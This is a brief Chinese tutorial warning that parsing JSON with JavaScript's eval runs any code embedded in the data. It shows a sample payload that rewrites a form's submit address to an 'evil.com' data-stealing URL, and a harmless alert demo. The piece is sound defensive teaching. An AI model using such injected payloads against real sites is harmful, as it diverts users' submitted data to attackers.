JSON(javascript object notation)可以说是XML的替代品,也是一种数据格式,但JSON更加简单简洁。
我们时常会想把JSON的字符串形式转换成对象,而js提供的eval函数可以帮我们完成这个工作。
var testJson = “{"name": "test", "age": 30}”;
var jsonVal = eval(testJson); //{"name": "test", "age": 30}
alert(jsonVal.age); //30
这是因为eval是一个能够解析js代码的函数。所以如果有人恶意在JSON的数据中插入恶意代码,比如修改表单提交的地址。
[ 1, 2, (function(){
document.forms[0].action = “http://evil.com/stealdata.php”;
})(), 3, 4]
用eval解析JSON数据时,上面的函数会被执行。
[ 1, 2, (function(){
alert("hacked!!!");
})(), 3, 4]
用eval会输出hacked!!!。
这里只是举了一个简单的例子,只是想说,用eval函数来解析JSON数据存在很大的安全性问题,最好避免这么做。就算要这么做,那么在之前需要进行过滤!